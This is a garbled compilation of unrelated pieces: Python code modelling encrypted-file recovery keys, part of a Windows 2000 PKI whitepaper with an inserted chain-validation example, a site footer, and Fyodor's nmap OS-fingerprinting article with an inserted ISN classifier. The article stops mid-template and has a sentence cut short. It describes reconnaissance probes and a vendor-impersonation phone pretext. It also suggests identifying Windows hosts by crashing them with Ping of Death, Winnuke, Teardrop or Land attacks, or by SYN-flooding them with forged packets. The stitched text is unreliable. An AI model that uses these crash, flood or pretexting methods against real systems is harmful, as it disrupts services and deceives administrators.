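    for offset in range(0, len(data), 32):
        block = hashlib.sha256(key + (offset // 32).to_bytes(8, "big")).digest()
        out.extend(a ^ b for a, b in zip(data[offset:offset + 32], block))
    return bytes(out)


@dataclass
class EncryptedFile:
    ciphertext: bytes
    ddf: Dict[str, int]   # owner name -> file key wrapped under the owner's public key
    drf: Dict[str, int]   # agent name -> file key wrapped under that agent's public key


def encrypt_file(plaintext: bytes, owner: Tuple[str, KeyPair],
                 recovery_agents: Dict[str, KeyPair]) -> EncryptedFile:
    fek = secrets.token_bytes(16)                  # fresh random file encryption key
    owner_name, owner_pub = owner
    ef = EncryptedFile(
        ciphertext=_keystream_xor(fek, plaintext),
        ddf={owner_name: wrap_key(fek, owner_pub)},
        drf={name: wrap_key(fek, pub) for name, pub in recovery_agents.items()},
    )
    del fek                                        # only wrapped copies survive
    return ef


def decrypt_file(ef: EncryptedFile, who: str, priv: KeyPair) -> bytes:
    """Owner and agents each unwrap their own copy; anyone else has nothing to unwrap."""
    wrapped = ef.ddf.get(who, ef.drf.get(who))
    if wrapped is None:
        raise PermissionError(f"{who} holds no wrapped copy of the file key")
    return _keystream_xor(unwrap_key(wrapped, priv), ef.ciphertext)


def key_holders(ef: EncryptedFile) -> set:
    """Principals who can open the file with their own private key alone."""
    return set(ef.ddf) | set(ef.drf)
```

For S/MIME the same `encrypt_file` shape applies with the recipients' encryption certificates in place of the recovery agents: the sender never needs a shared secret with any recipient, which is the property the whitepaper credits for PK's adoption in store-and-forward e-mail. Note that recovery works because the agent's wrapped copy is created at encryption time; a file encrypted before an agent was added to the recovery policy carries no copy for that agent.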
In operation, the system recognizes a smart-card insertion event as an alternative to the standard CTRL + ALT + DEL secure attention sequence to initiate a logon. The user is then prompted for the smart-card PIN code, which controls access to operations with the private key stored on the smart card. In this system, the smart card also contains a copy of the user's certificate (issued by an enterprise CA). This allows the user to roam within the domain.

IP Security (IPSec)

IPSec defines protocols for network encryption at the IP protocol layer. IPSec does not require PK-based technology and can use shared-secret keys that are communicated securely through an out-of-band mechanism at the network end-points for encryption. The IETF IPSec working group recognized, however, that PK-based technology offers a practical solution to create a scalable distributed trust architecture, in particular, one in which IPSec devices can mutually authenticate each other and agree upon encryption keys without reliance on prearranged shared secrets. The IPSec community, including Microsoft, is actively working on standards for interoperable certificates and certificate enrollment and management protocols. Although a level of interoperability has been demonstrated, there is still work required to ensure broad interoperability across IPSec devices and PKI implementations. Microsoft is committed to developing its Windows 2000 PKI in conjunction with these evolving standards.

Interoperability Criteria

In an ideal world, a PKI would be exactly that: an infrastructure. CAs would issue a suite of completely interoperable certificates based on a standard certificate-request protocol. Applications would then evaluate them in a consistent manner (including whether they have been revoked), and there would be no ambiguity in either the syntactic or semantic interpretation anywhere in the process. The industry has yet to achieve this level of interoperability.
As more applications take advantage of PK-based technology, relatively seamless interoperability is achievable. Today, SSL/TLS and S/MIME work well across multiple vendor products. Newer applications, such as code signing and digitally signed forms, are not yet reliable. More troublesome is the fact that there is no current technical mechanism to compare names in two different language encodings. Unicode, for example, allows accented characters to be encoded in multiple equivalent forms. In the future, at least two major forces will drive interoperability:

Initial trials, followed by a growing dependence on PK-based systems.
Greater emphasis on standards.

Microsoft is actively involved in the development of PK-relevant standards and is committed to building a product based on accepted current standards to maximize interoperability.

Internet Standards

Internet standards do not ensure interoperability, although they help. The historic problem with standards is that commercial product deployment outpaces the collaborative process. This has been especially true in PK technology, where the IETF currently has multiple working groups actively developing proposed standards for PK-based technology. Many of the applications that are potential beneficiaries of these standards are already shipping products. Moreover, no standard can anticipate every application requirement and dependency. Even the most comprehensive standards must be adapted in implementation. Interoperability, then, is the result of standards tempered by market realities. The IETF working group charged with defining the basis for an interoperable PKI is PKIX (X.509). After almost three full years of work, the basic architecture is in place. The specification, RFC 2459, Internet Public Key Infrastructure X.509 Certificate and CRL Profile, Part 1, is available at ftp://ftp.isi.edu/in-notes/rfc2459.txt.
Microsoft is heavily involved in work on this standard within the IETF and is committed to assuring that its PKI products are compliant with it. Once ratified, this will become an important factor in defining a robust PKI that ensures certificates that can be requested, interpreted, and revoked in some standard way. There are also a number of other efforts within the IETF that may have significant impact on PKI interoperability. These are being driven by the needs of PK-based applications, notably TLS, S/MIME, and IPSec. In each case, these applications made it necessary to define a PKIX subset that meets their needs; often they supersede PKIX-defined functionality. Although this could appear to fragment the process, it does create a close-in feedback loop for the PKI designers. It is not surprising, then, that the most aggressive set of application-dependent standards are products of the IETF S/MIME working group (http://www.ietf.org/ids.by.wg/smime.html). Of these, the (S/MIME) Cryptographic Message Syntax, S/MIME Version 3 Message Specification, S/MIME Version 3 Certificate Handling, and Certificate Request Syntax are the most important. The S/MIME community, like TLS before it, has the advantage of starting with a de facto standard. PKIX also started with a standard (X.509), but this has proven inadequate as a basis for interoperable PK-based systems. This means that PKIX Part 1, the base IETF standard, is gaining experience from the applications that are trying to use it. A recent example of the feedback process is certificate chain verification. PKIX Part 1 suggests, but does not specify, a certificate-chain validation algorithm. One possible interpretation of the current Internet draft is that name-chaining (that is, matching the certificate issuer name against a CA name in the subject field of the parent certificate) must always be enforced, even if information such as AuthorityKeyIdentifier (issuer of a public key) is present. 
An inherent problem with this approach, however, is that it does not accommodate two significant public-key environments: one where there is no directory available to locate CA certificates by name, and complex ones where there is a web of cross-certified CAs. The PKIX working group did not encounter this class of problem until applications tried to generalize their chain validation algorithms and found that they could not. The positive effect of this is that the feedback loop is working, and the new mechanism is now reflected in the standard. There is also an important forcing function on the horizon for PKI interoperability. The National Institute of Standards and Technology (NIST) has established an interoperability work group, consisting of AT&T, CertCo, Certicom, Cylink, Digital Signature Trust, Dynacorp, Entrust, Frontier Technologies, GTE, ID Certify, MasterCard, Microsoft, Motorola, Spyrus, VeriSign, and Visa. The goal of this project is to ensure minimum interoperability between the members' implementations of PKIX Part 1. NIST is optimistic that this forum will resolve any ambiguities and/or errors in the new PKIX standard. Another factor in defining PKI standards lies entirely outside the IETF. There is a set of de facto cryptographic message standards (PKCS) developed and maintained by RSA Laboratories (http://www.rsa.com/rsalabs/html/standards.html) that is already broadly deployed in products. The PKCS standards, first published in 1990, include syntax for cryptographic messages. The standards that are most relevant to PKI are PKCS-7, Cryptographic Message Syntax Standard, and PKCS-10, Certification Request Syntax Standard. The significance of the RSA standards is that they provide a basic, but well-understood framework for interoperability. In fact, when the PKIX working group proposed another standard for certificate management, the S/MIME working group created its own proposal based on PKCS.
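The chain-validation discussion above, together with the earlier Trust and Trusted CA Roots sections, describes what a relying party actually does: locate the issuer of each certificate, walk up to a trusted root, apply the usage restrictions configured on that root, and consult the CRL. The following model is an added example, not Microsoft's CryptoAPI chain engine and not a PKIX reference implementation. Certificates are plain records rather than parsed X.509, signature verification is modelled as "the child's AuthorityKeyIdentifier names the parent's key", and every name, key identifier, serial number and the small cross-certified pool are constructed for the example; the ExtendedKeyUsage OIDs are the real PKIX values. It shows concretely why name chaining alone is ambiguous once a CA has been re-keyed or cross-certified, and how the key identifier resolves that.

```python
"""Added example (not Microsoft code): rooted-hierarchy chain validation with
name chaining vs. AuthorityKeyIdentifier chaining, root EKU restrictions, CRL.
Certificates are records, not X.509; all sample data is constructed.
"""
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Optional, Set

# PKIX ExtendedKeyUsage OIDs (real values); an empty set means unrestricted.
EKU_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
EKU_CODE_SIGNING = "1.3.6.1.5.5.7.3.3"
EKU_EMAIL = "1.3.6.1.5.5.7.3.4"
ANY_USAGE: FrozenSet[str] = frozenset()


@dataclass(frozen=True)
class Cert:
    subject: str
    issuer: str
    serial: int
    ski: str                        # SubjectKeyIdentifier: identifies this key
    aki: Optional[str] = None       # AuthorityKeyIdentifier: SKI of the signing key
    is_ca: bool = False
    eku: FrozenSet[str] = ANY_USAGE

    @property
    def self_signed(self) -> bool:
        return self.subject == self.issuer and self.aki in (None, self.ski)


def issuer_candidates(cert: Cert, pool: List[Cert], use_aki: bool) -> List[Cert]:
    """Name chaining: every CA cert whose subject equals our issuer.
    AKI chaining: only those that hold the key that actually signed us."""
    by_name = [c for c in pool if c.is_ca and c.subject == cert.issuer]
    if use_aki and cert.aki is not None:
        return [c for c in by_name if c.ski == cert.aki]
    return by_name


def signature_ok(child: Cert, parent: Cert) -> bool:
    """Stand-in for verifying child's signature with parent's public key."""
    return child.aki == parent.ski


def build_chain(leaf: Cert, pool: List[Cert], trusted_roots: Dict[str, FrozenSet[str]],
                use_aki: bool = True, max_depth: int = 8) -> Optional[List[Cert]]:
    """Depth-first path construction from the leaf to a trusted self-signed root."""
    def walk(cert: Cert, path: List[Cert]) -> Optional[List[Cert]]:
        if cert.self_signed:
            return path if cert.ski in trusted_roots else None
        if len(path) >= max_depth:
            return None
        for parent in issuer_candidates(cert, pool, use_aki):
            if parent in path or not signature_ok(cert, parent):
                continue                      # loop, or a same-named CA with another key
            found = walk(parent, path + [parent])
            if found:
                return found
        return None
    return walk(leaf, [leaf])


def validate(leaf: Cert, pool: List[Cert], trusted_roots: Dict[str, FrozenSet[str]],
             intended_use: str, crl: Dict[str, Set[int]]) -> str:
    """trusted_roots maps a root's SKI to the EKU OIDs policy allows for it.
    crl maps an issuing key's SKI to the serials it has revoked."""
    chain = build_chain(leaf, pool, trusted_roots)
    if chain is None:
        return "no path to a trusted root"
    allowed = trusted_roots[chain[-1].ski]
    if allowed and intended_use not in allowed:
        return "root not trusted for this usage"
    if leaf.eku and intended_use not in leaf.eku:
        return "certificate not issued for this usage"
    for child, parent in zip(chain, chain[1:]):
        if child.serial in crl.get(parent.ski, set()):
            return "revoked"
    return "valid"


# Constructed sample pool: the Sales CA has been re-keyed (two certs, one name)
# and its current key is also cross-certified by a second enterprise's root.
ROOT_A = Cert("CN=Contoso Root A", "CN=Contoso Root A", 1, ski="A1", is_ca=True)
ROOT_B = Cert("CN=Fabrikam Root B", "CN=Fabrikam Root B", 1, ski="B1", is_ca=True)
SALES_OLD = Cert("CN=Sales CA", "CN=Contoso Root A", 10, ski="S1", aki="A1", is_ca=True)
SALES_NEW = Cert("CN=Sales CA", "CN=Contoso Root A", 11, ski="S2", aki="A1", is_ca=True)
SALES_XCERT = Cert("CN=Sales CA", "CN=Fabrikam Root B", 77, ski="S2", aki="B1", is_ca=True)
ALICE = Cert("CN=alice", "CN=Sales CA", 500, ski="E1", aki="S2",
             eku=frozenset({EKU_EMAIL, EKU_CLIENT_AUTH}))
POOL = [ROOT_A, ROOT_B, SALES_OLD, SALES_NEW, SALES_XCERT]
```

With `use_aki=False`, `issuer_candidates(ALICE, POOL, False)` returns all three "CN=Sales CA" certificates and the walker has to reject the stale key by signature before it finds the right one; with the key identifier it goes straight to the two certificates for key S2, and whichever trusted root the relying party holds (Contoso's or, via the cross-certificate, Fabrikam's) determines which path succeeds. A root restricted by policy to E-mail rejects the same certificate for client authentication even though the leaf permits it, which is the per-root usage restriction the Trusted CA Roots section describes.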
This response is typical of IETF practices and reflects market awareness. De facto standards are often the best kind, and Microsoft has taken advantage of these standards in its current PKI implementation to maximize interoperability. It is fair to expect the standards process to lay the groundwork, but it is ultimately some subset of its standards that multiple vendors incorporate in their products to create interoperable solutions. A good example of the role that market forces play in the determination of PK interoperability is how trust models work. The term infrastructure implies that PKIs themselves can be linked together. If, for example, a department within a company chooses Vendor A's PKI model for its application and the company later chooses Vendor B for its mail system, it makes sense that there should be some natural overlap. It gets slightly more complicated when Company A and Company B want to selectively join their PKIs in a business-specific extranet. The technical complexity comes from having to map the trust relationships (who trusts whom for what) between the entities and keep track of them over time. There are currently three competing models for how trust relationships should work:

Rooted hierarchies (for example, VeriSign, Microsoft, and Netscape)
Networks (for example, Entrust)
Webs (for example, PGP)

Each of these three trust models assumes something different about how trust relationships are established and maintained, whether they are created directly or through an intermediary. Different trust models probably will not interoperate seamlessly. At best, sufficient flexibility can be built into a PKI, along with supporting administrative tools, to allow users to integrate separate trust models in a way that makes sense for specific business reasons.

Preparing for Windows 2000 PKI

S/MIME-based E-mail Using Exchange Server

Public Key Infrastructure–based security is relatively new, and there are very few case studies of actual PKI deployment.
To deploy PKI on a wide scale, a corporation must educate its users, understand the key/certificate management issues, and understand the risks and liabilities associated with PKI. There are a number of companies that can provide assistance on these issues. A list is available at www.microsoft.com/security/partners/. One of the most common areas that can benefit from the use of PKI security is e-mail. Using S/MIME, which is based on PKI, customers can send digitally signed and encrypted e-mail. Through the use of S/MIME-based e-mail, corporations can start deploying PKI and build up experience and expertise. Microsoft recommends that customers who want to deploy PKI start with Microsoft Exchange Server 5.5 (SP1) and the Microsoft Outlook 98 messaging and collaboration client, which offers S/MIME based e-mail. The key pieces of a PKI included in Microsoft Exchange and Microsoft Outlook are:

Key Management server with built-in key recovery features.
X.509 version 3 Certificate Server.
LDAP-based Exchange directory service.
S/MIME clients (Outlook) using CryptoAPI.

Microsoft Exchange Server 5.5 with Microsoft Outlook provides secure e-mail, along with key recovery features and the ability to have multiple Key Management servers and a certificate trust hierarchy. Microsoft will provide a migration path for Exchange users to move to the more generalized PKI infrastructure provided by Windows 2000, which includes a common enterprise directory service (the Active Directory) and a common Enterprise Certificate Authority. In a future release, Microsoft will make the Key Management server a more general-purpose system that other applications can use.

For More Information

For the latest information on Windows 2000 Server and Windows NT, visit the Web site at http://www.microsoft.com/ntserver, the Microsoft security site at http://www.microsoft.com/security, and the Windows NT Server Forum on the Microsoft Network (GO WORD: MSNTS).
OSAll © 1998, 1999 Owl Services and Mike Hudack. Owl Services is not responsible for any content herein, and expects all visitors to act responsibly. OSAll stands for Owl Site All. Editorial content does not necessarily reflect the opinion of OSAll, Burst! Media or its advertisers. Owl Services would like to thank Attrition.org, Hacker News Network and Real Secure.

-- EOF

(www.insecure.org)
Written: October 18, 1998
Last Modified: April 10, 1999
[French Translation by Arhuman]
[Portuguese Translation by Frank Ned]

This paper may be freely distributed. The latest copy should always be available at http://www.insecure.org/nmap/nmap-fingerprinting-article.html

ABSTRACT

This paper discusses how to glean precious information about a host by querying its TCP/IP stack. I first present some of the "classical" methods of determining host OS which do not involve stack fingerprinting. Then I describe the current "state of the art" in stack fingerprinting tools. Next comes a description of many techniques for causing the remote host to leak information about itself. Finally I detail my (nmap) implementation of this, followed by a snapshot gained from nmap which discloses what OS is running on many popular Internet sites.

REASONS

I think the usefulness of determining what OS a system is running is pretty obvious, so I'll make this section short. One of the strongest examples of this usefulness is that many security holes are dependent on OS version. Let's say you are doing a penetration test and you find port 53 open. If this is a vulnerable version of Bind, you only get one chance to exploit it since a failed attempt will crash the daemon. With a good TCP/IP fingerprinter, you will quickly find that this machine is running 'Solaris 2.51' or 'Linux 2.0.35' and you can adjust your shellcode accordingly.
A worse possibility is someone scanning 500,000 hosts in advance to see what OS is running and what ports are open. Then when someone posts (say) a root hole in Sun's comsat daemon, our little cracker could grep his list for 'UDP/512' and 'Solaris 2.6' and he immediately has pages and pages of rootable boxes. It should be noted that this is SCRIPT KIDDIE behavior. You have demonstrated no skill and nobody is even remotely impressed that you were able to find some vulnerable .edu that had not patched the hole in time. Also, people will be even less impressed if you use your newfound access to deface the department's web site with a self-aggrandizing rant about how damn good you are and how stupid the sysadmins must be.

Another possible use is for social engineering. Let's say that you are scanning your target company and nmap reports a 'Datavoice TxPORT PRISM 3000 T1 CSU/DSU 6.22/2.06'. The hacker might now call up as 'Datavoice support' and discuss some issues about their PRISM 3000. "We are going to announce a security hole soon, but first we want all our current customers to install the patch -- I just mailed it to you ..." Some naive administrators might assume that only an authorized engineer from Datavoice would know so much about their CSU/DSU.

Another potential use of this capability is evaluation of companies you may want to do business with. Before you choose a new ISP, scan them and see what equipment is in use. Those "$99/year" deals don't sound nearly so good when you find out they have crappy routers and offer PPP services off a bunch of Windows boxes.

CLASSICAL TECHNIQUES

Stack fingerprinting solves the problem of OS identification in a unique way. I think this technique holds the most promise, but there are currently many other solutions. Sadly, this is still one of the most effective of those techniques:

playground~> telnet hpux.u-aizu.ac.jp
Trying 163.143.103.12 ...
Connected to hpux.u-aizu.ac.jp.
Escape character is '^]'.
HP-UX hpux B.10.01 A 9000/715 (ttyp2)

login:

There is no point going to all this trouble of fingerprinting if the machine will blatantly announce to the world exactly what it is running! Sadly, many vendors ship current systems with these kinds of banners and many admins do not turn them off. Just because there are other ways to figure out what OS is running (such as fingerprinting), does not mean we should just announce our OS and architecture to every schmuck who tries to connect. The problems with relying on this technique are that an increasing number of people are turning banners off, many systems don't give much information, and it is trivial for someone to "lie" in their banners. Nevertheless, banner reading is all you get for OS and OS Version checking if you spend $thousands on the commercial ISS scanner. Download nmap or queso instead and save your money :).

Even if you turn off the banners, many applications will happily give away this kind of information when asked. For example let's look at an FTP server:

payfonez> telnet ftp.netscape.com 21
Trying 207.200.74.26 ...
Connected to ftp.netscape.com.
Escape character is '^]'.
220 ftp29 FTP server (UNIX(r) System V Release 4.0) ready.
SYST
215 UNIX Type: L8 Version: SUNOS

First of all, it gives us system details in its default banner. Then if we give the 'SYST' command it happily feeds back even more information. If anon FTP is supported, we can often download /bin/ls or other binaries and determine what architecture it was built for. Many other applications are too free with information. Take web servers for example:

playground> echo 'GET / HTTP/1.0\n' | nc hotbot.com 80 | egrep '^Server:'
Server: Microsoft-IIS/4.0
playground>

Hmmm ... I wonder what OS those lamers are running. Other classic techniques include DNS host info records (rarely effective) and social engineering.
If the machine is listening on 161/udp (snmp), you are almost guaranteed a bunch of detailed info using 'snmpwalk' from the CMU SNMP tools distribution and the 'public' community name.

CURRENT FINGERPRINTING PROGRAMS

Nmap is not the first OS recognition program to use TCP/IP fingerprinting. The common IRC spoofer sirc by Johan has included very rudimentary fingerprinting techniques since version 3 (or earlier). It attempts to place a host in the classes "Linux", "4.4BSD", "Win95", or "Unknown" using a few simple TCP flag tests. Another such program is checkos, released publicly in January of this year by Shok in Confidence Remains High Issue #7. The fingerprinting techniques are exactly the same as SIRC, and even the code is identical in many places. Checkos was privately available for a long time prior to the public release, so I have no idea who swiped code from whom. But neither seems to credit the other. One thing checkos does add is telnet banner checking, which is useful but has the problems described earlier.

[ Update: Shok wrote in to say that checkos was never intended to be public and this is why he didn't bother to credit SIRC for some of the code. ]

Su1d also wrote an OS checking program. His is called SS and as of Version 3.11 it can identify 12 different OS types. I am somewhat partial to this one since he credits my nmap program for some of the networking code :).

Then there is queso. This program is the newest and it is a huge leap forward from the other programs. Not only do they introduce a couple new tests, but they were the first (that I have seen) to move the OS fingerprints out of the code.
The other scanners included code like:

/* from ss */
if ((flagsfour & TH_RST) && (flagsfour & TH_ACK) && (winfour == 0) && (flagsthree & TH_ACK))
    reportos(argv[2],argv[3],"Livingston Portmaster ComOS");

Instead, queso moves this into a configuration file which obviously scales much better and makes adding an OS as easy as appending a few lines to a fingerprint file. Queso was written by Savage, one of the fine folks at Apostols.org.

One problem with all the programs described above is that they are very limited in the number of fingerprinting tests, which limits the granularity of answers. I want to know more than just 'this machine is OpenBSD, FreeBSD, or NetBSD', I wish to know exactly which of those it is as well as some idea of the release version number. In the same way, I would rather see 'Solaris 2.6' than simply 'Solaris'. To achieve this response granularity, I worked on a number of fingerprinting techniques which are described in the next section.

FINGERPRINTING METHODOLOGY

There are many, many techniques which can be used to fingerprint networking stacks. Basically, you just look for things that differ among operating systems and write a probe for the difference. If you combine enough of these, you can narrow down the OS very tightly. For example nmap can reliably distinguish Solaris 2.4 vs. Solaris 2.5-2.51 vs Solaris 2.6. It can also tell Linux kernel 2.0.30 from 2.0.31-34 or 2.0.35. Here are some techniques:

The FIN probe -- Here we send a FIN packet (or any packet without an ACK or SYN flag) to an open port and wait for a response. The correct RFC 793 behavior is to NOT respond, but many broken implementations such as MS Windows, BSDI, CISCO, HP/UX, MVS, and IRIX send a RESET back. Most current tools utilize this technique.

The BOGUS flag probe -- Queso is the first scanner I have seen to use this clever test. The idea is to set an undefined TCP "flag" (64 or 128) in the TCP header of a SYN packet.
Linux boxes prior to 2.0.35 keep the flag set in their response. I have not found any other OS to have this bug. However, some operating systems seem to reset the connection when they get a SYN+BOGUS packet. This behavior could be useful in identifying them.

TCP ISN Sampling -- The idea here is to find patterns in the initial sequence numbers chosen by TCP implementations when responding to a connection request. These can be categorized into many groups such as the traditional 64K (many old UNIX boxes), Random increments (newer versions of Solaris, IRIX, FreeBSD, Digital UNIX, Cray, and many others), True "random" (Linux 2.0.*, OpenVMS, newer AIX, etc). Windows boxes (and a few others) use a "time dependent" model where the ISN is incremented by a small fixed amount each time period. Needless to say, this is almost as easily defeated as the old 64K behavior. Of course my favorite technique is "constant". The machines ALWAYS use the exact same ISN :). I've seen this on some 3Com hubs (uses 0x803) and Apple LaserWriter printers (uses 0xC7001). You can also subclass groups such as random incremental by computing variances, greatest common divisors, and other functions on the set of sequence numbers and the differences between the numbers. It should be noted that ISN generation has important security implications. For more information on this, contact "security expert" Tsutomu "Shimmy" Shimomura at SDSC and ask him how he was owned. Nmap is the first program I have seen to use this for OS identification.

Don't Fragment bit -- Many operating systems are starting to set the IP "Don't Fragment" bit on some of the packets they send. This gives various performance benefits (though it can also be annoying -- this is why nmap fragmentation scans do not work from Solaris boxes). In any case, not all OS's do this and some do it in different cases, so by paying attention to this bit we can glean even more information about the target OS. I haven't seen this one before either.
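The ISN sampling classification described above, as an added example that is not nmap's code: it takes a handful of observed ISNs, computes the differences and their GCD, and buckets them into the classes the article names (constant, 64K, i800, time dependent, random increments, truly random). The thresholds are my own approximation of the idea, and the sample sequences are constructed rather than captured.

```python
"""TCP ISN sampling classifier (added example, not nmap's own code).

Buckets a handful of initial sequence numbers observed in replies to
successive connection requests into the classes the article lists. The
thresholds are my own approximation, not nmap's exact rules, and the sample
sequences below are constructed, not captured from real hosts.
"""
from functools import reduce
from math import gcd
from statistics import mean, pvariance

MOD32 = 1 << 32  # sequence numbers are 32-bit and wrap around


def isn_diffs(isns):
    """Forward difference between consecutive ISNs, modulo 2^32."""
    return [(b - a) % MOD32 for a, b in zip(isns, isns[1:])]


def classify_isn(isns):
    """Return (class, gcd of the differences).

    C    constant: the same ISN every time (the 3Com hub / LaserWriter case)
    64K  every step is a multiple of 64000 (the traditional old UNIX behaviour)
    i800 every step is a multiple of 800 (the IRIX class in the template)
    TD   time dependent: small, nearly constant increments
    RI   random positive increments
    TR   truly random: no monotonic counter behind the values at all
    """
    if len(isns) < 3:
        raise ValueError("need at least three ISN samples")
    diffs = isn_diffs(isns)
    if all(d == 0 for d in diffs):
        return "C", 0
    g = reduce(gcd, diffs)
    if g % 64000 == 0:
        return "64K", g
    if g % 800 == 0:
        return "i800", g
    if any(d >= MOD32 // 2 for d in diffs):
        return "TR", g          # a "backwards" step: the counter is not monotonic
    if pvariance(diffs) < 100 and mean(diffs) < (1 << 16):
        return "TD", g          # small, steady steps, as the article describes for Windows
    return "RI", g              # monotonic but with large, varying steps


def tseq_line(isns):
    """Render the class in the fingerprint-file syntax the article shows, e.g. TSeq(Class=i800)."""
    cls, _ = classify_isn(isns)
    return f"TSeq(Class={cls})"


# Constructed sample sequences (not real captures), one per class.
SAMPLES = {
    "laserwriter_constant": [0xC7001] * 6,
    "old_unix_64k": [0x100000 + 64000 * i for i in range(6)],
    "irix_i800": [0x1000, 0x1000 + 800, 0x1000 + 2400, 0x1000 + 4800, 0x1000 + 5600, 0x1000 + 8800],
    "windows_time_dependent": [1000, 1010, 1020, 1031, 1041, 1051],
    "random_increment": [0x10000000, 0x10000000 + 12345, 0x10000000 + 111110,
                         0x10000000 + 156788, 0x10000000 + 180244, 0x10000000 + 258021],
    "true_random": [0x9A3F1C2B, 0x0D41E7F0, 0xC8A21977, 0x33B0F0A1, 0x7E12C4D9, 0xF4A0B3E2],
}


def classify_samples():
    """Classify every constructed sample; returns {name: TSeq line}."""
    return {name: tseq_line(isns) for name, isns in SAMPLES.items()}


if __name__ == "__main__":
    for name, line in classify_samples().items():
        print(f"{name:24} {line}")
```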
TCP Initial Window -- This simply involves checking the window size on returned packets. Older scanners simply used a non-zero window on a RST packet to mean "BSD 4.4 derived". Newer scanners such as queso and nmap keep track of the exact window since it is actually pretty constant by OS type. This test actually gives us a lot of information, since some operating systems can be uniquely identified by the window alone (for example, AIX is the only OS I have seen which uses 0x3F25). In their "completely rewritten" TCP stack for NT5, Microsoft uses 0x402E. Interestingly, that is exactly the number used by OpenBSD and FreeBSD.

ACK Value -- Although you would think this would be completely standard, implementations differ in what value they use for the ACK field in some cases. For example, let's say you send a FIN|PSH|URG to a closed TCP port. Most implementations will set the ACK to be the same as your initial sequence number, though Windows and some stupid printers will send your seq + 1. If you send a SYN|FIN|URG|PSH to an open port, Windows is very inconsistent. Sometimes it sends back your seq, other times it sends S++, and still other times it sends back a seemingly random value. One has to wonder what kind of code MS is writing that changes its mind like this.

ICMP Error Message Quenching -- Some (smart) operating systems follow the RFC 1812 suggestion to limit the rate at which various error messages are sent. For example, the Linux kernel (in net/ipv4/icmp.h) limits destination unreachable message generation to 80 per 4 seconds, with a 1/4 second penalty if that is exceeded. One way to test this is to send a bunch of packets to some random high UDP port and count the number of unreachables received. I have not seen this used before, and in fact I have not added this to nmap (except for use in UDP port scanning). This test would make the OS detection take a bit longer since you need to send a bunch of packets and wait for them to return.
Also dealing with the possibility of packets dropped on the network would be a pain.

ICMP Message Quoting -- The RFCs specify that ICMP error messages quote some small amount of an ICMP message that causes various errors. For a port unreachable message, almost all implementations send only the required IP header + 8 bytes back. However, Solaris sends back a bit more and Linux sends back even more than that. The beauty with this is it allows nmap to recognize Linux and Solaris hosts even if they don't have any ports listening.

ICMP Error message echoing integrity -- I got this idea from something Theo De Raadt (lead OpenBSD developer) posted to comp.security.unix. As mentioned before, machines have to send back part of your original message along with a port unreachable error. Yet some machines tend to use your headers as 'scratch space' during initial processing and so they are a bit warped by the time you get them back. For example, AIX and BSDI send back an IP 'total length' field that is 20 bytes too high. Some BSDI, FreeBSD, OpenBSD, ULTRIX, and VAXen fuck up the IP ID that you sent them. While the checksum is going to change due to the changed TTL anyway, there are some machines (AIX, FreeBSD, etc.) which send back an inconsistent or 0 checksum. Same thing goes with the UDP checksum. All in all, nmap does nine different tests on the ICMP errors to sniff out subtle differences like these.

Type of Service -- For the ICMP port unreachable messages I look at the type of service (TOS) value of the packet sent back. Almost all implementations use 0 for this ICMP error although Linux uses 0xC0. This does not indicate one of the standard TOS values, but instead is part of the unused (AFAIK) precedence field. I do not know why this is set, but if they change to 0 we will be able to keep identifying the old versions and we will be able to distinguish between old and new.

Fragmentation Handling -- This is a favorite technique of Thomas H.
Ptacek of Secure Networks, Inc (now owned by a bunch of Windows users at NAI). This takes advantage of the fact that different implementations often handle overlapping IP fragments differently. Some will overwrite the old portions with the new, and in other cases the old stuff has precedence. There are many different probes you can use to determine how the packet was reassembled. I did not add this capability since I know of no portable way to send IP fragments (in particular, it is a bitch on Solaris). For more information on overlapping fragments, you can read their IDS paper (www.secnet.com).

TCP Options -- These are truly a gold mine in terms of leaking information. The beauty of these options is that:

1) They are generally optional (duh!) :) so not all hosts implement them.
2) You know if a host implements them by sending a query with an option set. The target generally shows support of the option by setting it on the reply.
3) You can stuff a whole bunch of options on one packet to test everything at once.

Nmap sends these options along with almost every probe packet:

Window Scale=10; NOP; Max Segment Size = 265; Timestamp; End of Ops;

When you get your response, you take a look at which options were returned and thus are supported. Some operating systems such as recent FreeBSD boxes support all of the above, while others, such as Linux 2.0.X support very few. The latest Linux 2.1.x kernels do support all of the above. On the other hand, they are more vulnerable to TCP sequence prediction. Go figure.

Even if several operating systems support the same set of options, you can sometimes distinguish them by the values of the options. For example, if you send a small MSS value to a Linux box, it will generally echo that MSS back to you. Other hosts will give you different values. And even if you get the same set of supported options AND the same values, you can still differentiate via the order that the options are given, and where padding is applied.
For example Solaris returns 'NNTNWME' which means:

While Linux 2.1.122 returns MENNTNW. Same options, same values, but different order! I have not seen any other OS detection tools utilize TCP options, but it is very useful. There are a few other useful options I might probe for at some point, such as those that support T/TCP and selective acknowledgements.

Exploit Chronology -- Even with all the tests above, nmap is unable to distinguish between the TCP stacks of Win95, WinNT, or Win98. This is rather surprising, especially since Win98 came out about 4 years after Win95. You would think they would have bothered to improve the stack in some way (like supporting more TCP options) and so we would be able to detect the change and distinguish the operating systems. Unfortunately, this is not the case. The NT stack is apparently the same crappy stack they put into '95. And they didn't bother to upgrade it for '98. But do not give up hope, for there is a solution. You can simply start with early Windows DOS attacks (Ping of Death, Winnuke, etc) and move up a little further to attacks such as Teardrop and Land. After each attack, ping them to see whether they have crashed. When you finally crash them, you will likely have narrowed what they are running down to one service pack or hotfix. I have not added this functionality to nmap, although I must admit it is very tempting :).

SYN Flood Resistance -- Some operating systems will stop accepting new connections if you send too many forged SYN packets at them (forging the packets avoids trouble with your kernel resetting the connections). Many operating systems can only handle 8 packets. Recent Linux kernels (among other operating systems) allow various methods such as SYN cookies to prevent this from being a serious problem. Thus you can learn something about your target OS by sending 8 packets from a forged source to an open port and then testing whether you can establish a connection to that port yourself.
This was not implemented in nmap since some people get upset when you SYN flood them. Even explaining that you were simply trying to determine what OS they are running might not help calm them.

NMAP IMPLEMENTATION AND RESULTS

I have created a reference implementation of the OS detection techniques mentioned above (except those I said were excluded). I have added this to my Nmap scanner which has the advantage that it already knows what ports are open and closed for fingerprinting so you do not have to tell it. It is also portable among Linux, *BSD, and Solaris 2.51 and 2.6, and some other operating systems.

The new version of nmap reads a file filled with Fingerprint templates that follow a simple grammar. Here is an example:

FingerPrint IRIX 6.2 - 6.4 # Thanks to Lamont Granquist
TSeq(Class=i800)
T1(DF=N%W=C000|EF2A%ACK=S++%Flags=AS%Ops=MNWNNT)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=C000|EF2A%ACK=O%Flags=A%Ops=NNT)
